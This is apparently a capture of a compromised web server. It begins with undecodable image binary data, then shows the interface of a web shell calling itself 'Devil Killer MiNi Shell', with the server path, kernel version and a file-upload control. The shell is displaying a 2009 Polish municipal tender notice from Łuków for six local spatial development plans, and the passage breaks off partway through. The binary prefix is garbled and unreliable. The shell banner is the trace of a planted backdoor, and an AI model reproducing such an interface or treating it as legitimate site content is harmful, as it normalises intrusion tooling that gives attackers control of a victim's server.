JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090527/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090527/168970-N-2009.html

<p class="kh_header"><b>Łuków: OPRACOWANIE 6 PROJAKTÓW MIEJSCOWYCH PLANÓW ZAGOSPODAROWANIA PRZESTRZENNEGO MIASTA ŁUKÓW ORAZ UDZIAŁ W CZYNNOŚCIACH ZWIĄZANYCH ZE SPORZĄDZENIEM PLANÓW.</b><br>
<b>Numer ogłoszenia: 168970 - 2009; data zamieszczenia: 27.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Łuków , ul. Piłsudskiego 17, 21-400 Łuków, woj. lubelskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lukow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OPRACOWANIE 6 PROJAKTÓW MIEJSCOWYCH PLANÓW ZAGOSPODAROWANIA PRZESTRZENNEGO MIASTA ŁUKÓW ORAZ UDZIAŁ W CZYNNOŚCIACH ZWIĄZANYCH ZE SPORZĄDZENIEM PLANÓW..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie 6 projektów miejscowych planów zagospodarowania przestrzennego miasta Łuków oraz udział w czynnościach związanych ze sporządzeniem planów w ramach zadania pn. Wykonanie projektu miejscowego planu zagospodarowania przestrzennego Miasta Łuków.
CZĘŚĆ I
Przedmiotem zamówienia jest wykonanie projektu miejscowego planu zagospodarowania przestrzennego miasta Łuków oraz udział w czynnościach związanych ze sporządzeniem planu. Projekt obejmuje teren położony w Łukowie pomiędzy granicami administracyjnymi miasta od strony północno-zachodniej, ul. Łapiguz i terenem PKP o pow. ok. 649 ha. 
CZĘŚĆ II
Przedmiotem zamówienia jest wykonanie projektu miejscowego planu zagospodarowania przestrzennego miasta Łuków oraz udział w czynnościach związanych ze sporządzeniem planu. Projekt obejmuje teren położony w Łukowie pomiędzy granicami administracyjnymi miasta od strony południowej, terenem PKP, ul. Warszawską, ul. Doktora Andrzeja Rogalińskiego, ul. 700-lecia i ul. Świderską z wyłączeniem działek Nr 7558/4 i Nr 7558/5 o pow. ok. 326 ha. 
CZĘŚĆ III
Przedmiotem zamówienia jest wykonanie projektu miejscowego planu zagospodarowania przestrzennego miasta Łuków oraz udział w czynnościach związanych ze sporządzeniem planu. Projekt obejmuje teren położony w Łukowie pomiędzy granicami administracyjnymi miasta od strony wschodniej, ul. Cieszkowizna, ul. Partyzantów, ul. Doktora Andrzeja Rogalińskiego, ul. Warszawską, terenem PKP o pow. ok. 626 ha. 
CZĘŚĆ IV
Przedmiotem zamówienia jest wykonanie projektu miejscowego planu zagospodarowania przestrzennego miasta Łuków oraz udział w czynnościach związanych ze sporządzeniem planu. Projekt obejmuje teren położony w Łukowie pomiędzy granicami administracyjnymi miasta od strony południowo-wschodniej, ul. Świderską, ul. 700-lecia, ul. Partyzantów i ul. Cieszkowizna o pow. ok. 655 ha. 
CZĘŚĆ V
Przedmiotem zamówienia jest wykonanie projektu miejscowego planu zagospodarowania przestrzennego miasta Łuków oraz udział w czynnościach związanych ze sporządzeniem planu. Projekt obejmuje teren położony w Łukowie pomiędzy granicami administracyjnymi miasta od strony południowo-zachodniej, ul. Łapiguz i terenem PKP o pow. ok. 330 ha. 
CZĘŚĆ VI
Przedmiotem zamówienia jest wykonanie projektu miejscowego planu zagospodarowania przestrzennego miasta Łuków oraz udział w czynnościach związanych ze sporządzeniem planu. Projekt obejmuje teren położony w Łukowie pomiędzy granicami administracyjnymi miasta od strony północno-wschodniej a terenem PKP o pow. ok. 878 ha.
Szczegółowy opis przedmiotu zamówienia określa specyfikacja istotnych warunków zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.40.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Oddział 1. Opis warunków udziału w postępowaniu 
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy: 
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
- zamawiający wymaga aby wykonawcy prowadzili zarejestrowaną działalność gospodarczą.
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; 
a)	wykonali w ciągu ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej  dwie usługi odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia tj: opracowanie dwóch projektów miejscowych planów zagospodarowania przestrzennego dla terenów o pow. 400 ha  każdy, które zostały już uchwalone, z podaniem ich wartości, oraz daty i miejsca wykonania. Do wykazu Wykonawca musi również dołączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie (np. referencje, protokoły odbioru, itp.),
b)	wskażą  osoby, którymi dysponują lub będą dysponować i które będą uczestniczyć  w wykonywaniu zamówienia posiadające następujące wykształcenie, doświadczenie i kwalifi?kacje zawodowe, a także zakres wykonywanych przez nie czynności
główny projektant planu  - co najmniej 1 osoba, wykształcenie wyższe doświadczenie 5 lata, opracowanie co najmniej 2 projektów miejscowych planów zagospodarowania przestrzennego.
c)	osoby, które będą uczestniczyć w wykonaniu zamówie?nia posiadają odpowiednio następujące uprawnienia:
główny projektant planu - wpis na listę członków Izby Urbanistów  w rozumieniu art. 5 ust. 3 w związku z art. 2 ust. 3 i art. 6 ust. 1 ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r., Nr 5, poz. 42, ze zm.) oraz art. 5 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr 80, poz. 717, ze zm.),
3)	znajdują się w sytuacji ekonomicznej i finansowej za?pewniającej wykonanie zamówienia;
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.


Oddział 2. Opis sposobu dokonywania oceny spełniania tych warunków 
1.	Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, jeżeli wykonawca złoży wraz z ofertą wszystkie dokumenty wskazane w oddziale 3 wykazujące spełnienie wymagań tam wskazanych. Brak załączenia przez wykonawcę któregokolwiek z dokumentów zostanie uznane przez zamawiającego jako niespełnienie warunku, co będzie skutkować wykluczeniem wykonawcy z postępowania, z zastrzeżeniem art. 26 ust. 3 Pzp. 
2.	Zamawiający wezwie wykonawców, którzy w określonym terminie nie złożyli wymaganych przez zamawiającego oświadczeń lub dokumentów, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez zamawiającego oświadczenia lub dokumenty lub którzy złożyli wadliwe pełnomocnictwa do ich złożenia w wyznaczonym terminie.
3.	Zamawiający zaniecha wzywania wykonawcy do uzupełnień, o których mowa w ust. 2, jeżeli mimo ich złożenia oferta wykonawcy będzie podlegać odrzuceniu albo konieczne będzie unieważnienie postępowania. 
4.	Oświadczenia i dokumenty składane na wezwanie zamawiającego muszą potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert (art. 26 ust. 3 Pzp). 
5.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, jednak każdy z wykonawców musi załączyć do oferty dokumenty, o których mowa w oddziale 3 ust. 1 i 3, a wszyscy wykonawcy muszą razem załączyć do oferty dokumenty, o których mowa w oddziale 3 ust. 2. Ponadto wykonawcy wspólnie ubiegający się o udzielenia zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia lub reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Jeżeli oferta wykonawców, wspólnie ubiegających się o udzielenia zamówienia, zostanie wybrana, zamawiający żąda przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych wykonawców, zgodnie z art. 23 Pzp. 
6.	Ofertę wykonawcy wykluczonego uznaje się za odrzuconą, zgodnie z art. 24 ust. 4 Pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oddział 3. Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu (jeżeli dotyczy) 
1. 	W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Pzp, Zamawiający żąda: 
1)   aktualnego odpisu z właściwego rejestru albo ak?tualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, przy czym odpis albo zaświadczenie nie może być wystawione? wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
2)	aktualnych zaświadczeń: 
a)	właściwego naczelnika urzędu skarbowego oraz 
b)	właściwego oddziału Za?kładu Ubezpieczeń Społecznych lub Kasy Rolni?czego Ubezpieczenia Społecznego 
	- potwierdzają?cych odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczeń, że wykonawca uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu, przy czym dokumenty nie mogą być wystawione wcześniej niż 3 miesiące przed upływem terminu składania ofert; 
3) 	aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 Pzp, przy czym informacja nie może być wystawiona wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
4) 	aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 Pzp, przy czym informacja nie może być wystawiona wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
2. 	W celu potwierdzenia opisanego przez zama?wiającego warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, zamawiający żąda: 
1)	wykazu zawierającego przynajmniej dwie wykonane usługi w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadającą swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że usługi te zo?stały wykonane należycie, przy czym z załączonych dokumentów musi wynikać, że: 
-  co najmniej dwie z wykazanych usług swoim rodzajem obejmują opracowanie: dwóch projektów miejscowych planów zagospodarowania przestrzennego dla terenów o pow. 400 ha każdy,  które zostały już uchwalone. 
2)	wykazu osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności. 
2a)	pisemnego zobowiązania innych niż wykonawca podmiotów do tego, aby wykonawca mógł dysponować wykazanymi osobami, jeżeli w wykazie, o którym mowa w pkt 2 wykonawca wskazał osoby, którymi będzie dysponował; 
3)	dokumentów stwierdzających, że osoby, którymi dysponuje wykonawca, posiadają wymagane uprawnienia, a w  szczególności wykonawca załączy do oferty dokumenty potwierdzające wpis na listę członków Izby Urbanistów  w rozumieniu art. 5 ust. 3 w związku z art. 2 ust. 3 i art. 6 ust. 1 ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r., Nr 5, poz. 42, ze zm.) oraz art. 5 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr 80, poz. 717, ze zm.), - dla głównego projektant planu .
3. 	W celu potwierdzenia opisanego przez zama?wiającego warunku nie podlegania wykluczeniu z postępowania o udzielenie zamówienia zamawiający żąda: 
-    oświadczenia, zgodnego z art. 22 ust. 1 Pzp, o spełnianiu warunków udziału w postępowaniu; 
4. 	Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej stosuje się do § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane. 
5. 	Wykonawca ma obowiązek składać dokumenty w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. 
6. 	Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości. 
7.    Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez         wykonawcę. Tłumaczenie nie jest wymagane, jeżeli zamawiający wyraził zgodę, o której mowa w art. 9 ust. 3 ustawy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 80</li>
<li>2 - Termin wykonania zamówienia - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.lukow.pl/bip.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Łuków ul. Piłsudskiego 17, 21-400 Łuków pok. 15 w godz. 7:30 - 15:30 od poniedziałku do piątku..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.06.2009 godzina 11:00, miejsce: URZĄD MIASTA ŁUKÓW UL. PIŁSUDSKIEGO 17, 21-400 ŁUKÓW POK. 109 SEKRETARIAT.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 001 <b>NAZWA:</b> Wykonanie projektu miejscowego planu zagospodarowania przestrzennego miasta Łuków oraz udział w czynnościach związanych ze sporządzeniem planu. Projekt obejmuje teren położony w Łukowie pomiędzy granicami administracyjnymi miasta od strony północno-zachodniej, ul. Łapiguz i terenem PKP o pow. ok. 649 ha..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) KRÓTKI OPIS ZE WSKAZANIEM WIELKOŚCI LUB ZAKRESU ZAMÓWIENIA
Przedmiotem zamówienia jest wykonanie projektu miejscowego planu zagospodarowania przestrzennego miasta Łuków oraz udział w czynnościach związanych ze sporządzeniem planu. Projekt obejmuje teren położony w Łukowie pomiędzy granicami administracyjnymi miasta od strony północno-zachodniej, ul. Łapiguz i terenem PKP o pow. ok. 649 ha. 
1.	Przedmiot zamówienia należy wykonać zgodnie z art. 15 ust. 2 ustawy z dnia 27.03.2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2003r. Nr 80, poz. 717 z późn. zm.) oraz  rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. z 2003r. Nr 164, poz. 1587).
2.	Wymagana skala projektu miejscowego planu zagospodarowania przestrzennego 1: 1000. 
3.	Zakres prac obejmuje: 
- wykonanie inwentaryzacji urbanistycznej,
- analizę wniosków do planu i opracowanie propozycji ich rozpatrzenia, 
- przygotowanie zawiadomień na piśmie o przystąpieniu do sporządzenia  planu dla instytucji i organów właściwych do uzgodnienia i opiniowania, 
- sporządzenie projektu planu wraz z prognozą oddziaływania na środowisko oraz prognozą skutków finansowych uchwalenia planu, 
- prezentacja koncepcji planu władzom gminy,
- uzyskanie niezbędnych opinii i uzgodnień do projektu planu, 
- wprowadzenie zmian do projektu planu wynikających z uzyskanych opinii i dokonanych uzgodnień, 
- przygotowanie ogłoszeń i obwieszczeń o wyłożeniu projektu  planu wraz z  prognozą oddziaływania na środowisko do publicznego wglądu, 
- udział w wyznaczonych przez zamawiającego co najmniej 3 dyżurach planistycznych w ramach dyskusji publicznej nad przyjętymi rozwiązaniami w projekcie planu i w prognozie oddziaływania na środowisko, 
- analiza i opracowanie propozycji rozpatrzenia uwag wniesionych w związku z wyłożeniem do publicznego wglądu projektu planu i prognozy oddziaływania na środowisko, 
- wprowadzenie zmian w projekcie planu wynikających z rozpatrzenia ewentualnych uwag, 
- ewentualne ponowne uzgodnienie projektu  planu w niezbędnych  zakresach, 
- przygotowanie projektu uchwały wraz z uzasadnieniem w sprawie przyjęcia projektu planu wraz z listą nieuwzględnionych uwag oraz przedstawienie Radzie Miasta Łuków,
- przekazanie Zamawiającemu kompletnych dokumentacji prac planistycznych dotyczących planu wraz z załącznikami w celu oceny ich zgodności z przepisami prawnymi przez Wojewodę. 
4.	Do czasu stwierdzenia przez Wojewodę zgodności planu z przepisami prawnymi, wszystkie czynności związane z obowiązkiem sporządzenia planu należą do Wykonawcy.
5.	Przedmiot zamówienia należy wykonać etapami zgodnie z Harmonogramem rzeczowo-finansowo-terminowym dotyczącym opracowania projektu miejscowego planu  zagospodarowania przestrzennego. 
6.	Wykonawcę zobowiązuje się do przygotowania kompletu dokumentów, wykazów, pism i zawiadomień wynikających z trybu opracowania planu, udziału Wykonawcy w posiedzeniach zorganizowanych dla wszystkich komisji Rady Miasta Łuków oraz sesjach Rady Miasta Łuków poświęconych pracom nad planem, przygotowaniem projektów pism, zawiadomień i uchwał wraz z uzasadnieniem w przypadku uwag do zmiany planu, skompletowania dokumentacji formalno-prawnej do przedłożenia w Lubelskim Urzędzie Wojewódzkim.
7.	Opracowania muszą zawierać część tekstową i graficzną uwzględniającą określenia wyszczególnione odpowiednio w art. 15  z uwzględnieniem art. 16 ustawy o planowaniu i zagospodarowaniu przestrzennym. 
8.	Przedmiot zamówienia należy wykonać:
a)	techniką tradycyjną wraz z zapisem na płycie CD/DVD niezabezpieczonej przed kopiowaniem (standard plików .doc, .pdf, .xls),
b)	w wersji cyfrowej umożliwiającej jej prawidłowe odczytanie przez program służący do zakładania i prowadzenia mapy wektorowej. 
UWAGA: Wersja cyfrowa musi umożliwić jej prawidłowe odczytanie przez program EWMAPA (wizualizacja danych) jak również część opisową przez moduł WINPLAN służący do zakładania, bieżącego prowadzenia oraz aktualizacji części opisowej planu zagospodarowania przestrzennego. Zamawiający posiada licencję do programu EWMAPA v.8.0. Wykonawca zainstaluje wersję elektroniczną na 4 stanowiskach komputerowych wskazanych przez Zamawiającego.
9.	 Warunki dotyczące dostarczenia dokumentacji dla Zamawiającego: Dokumenty dot. miejscowego planu zagospodarowania przestrzennego należy wykonać w następujących ilościach:
a)	wersja papierowa:
- tekst planu - 8 egz. oprawionych,
- rysunek planu w skali 1:1000 - 2 egz., 
- rysunek planu pomniejszony czarno-biały do publikacji - 2 egz. w tym 1 pocięty,
- rysunek planu pomniejszony kolorowy - 6 egz.,
- prognoza oddziaływania na środowisko - 3 egz. oprawione,
- prognoza skutków finansowych uchwalenia planu - 3 egz. oprawione; 
b)	2 płyty CD/DVD z zapisem niezabezpieczone przed kopiowaniem (standard plików .doc, .pdf, .xls) zawierające:
- tekst planu, prognozę oddziaływania na środowisko, prognozę skutków finansowych uchwalenia planu,
- rysunek planu w skali 1:1000, 
- rysunek planu pomniejszony czarno-biały do publikacji,
- rysunek planu pomniejszony kolorowy;
c)	wersja cyfrowa - 2 płyty CD/DVD.
Szczegółowy opis przedmiotu zamówienia określa specyfikacja istotnych warunków zamówienia.
W przypadku gdyby wykonawca uznał, że zamawiający zawarł w opisie przedmiotu zamówienia wskazanie znaków towarowych, patentów lub pochodzenia zamawiający dopuszcza składanie ofert na wyspecyfikowane przedmioty - lub równoważne. Za równoważne zamawiający rozumie takie opracowanie wersji cyfrowej planu, której standard i rozszerzenia plików umożliwia prawidłową konwersję oraz odczytanie przez oprogramowanie do którego zamawiający posiada licencję..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.40.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin wykonania zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 002 <b>NAZWA:</b> Wykonanie projektu miejscowego planu zagospodarowania przestrzennego miasta Łuków oraz udział w czynnościach związanych ze sporządzeniem planu. Projekt obejmuje teren położony w Łukowie pomiędzy granicami administracyjnymi miasta od strony południowej, terenem PKP, ul. Warszawską, ul. Doktora Andrzeja Rogalińskiego, ul. 700-lecia i ul. Świderską z wyłączeniem działek Nr 7558/4 i Nr 7558/5 o pow. ok. 326 ha..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie projektu miejscowego planu zagospodarowania przestrzennego miasta Łuków oraz udział w czynnościach związanych ze sporządzeniem planu. Projekt obejmuje teren położony w Łukowie pomiędzy granicami administracyjnymi miasta od strony południowej, terenem PKP, ul. Warszawską, ul. Doktora Andrzeja Rogalińskiego, ul. 700-lecia i ul. Świderską z wyłączeniem działek Nr 7558/4 i Nr 7558/5 o pow. ok. 326 ha. 
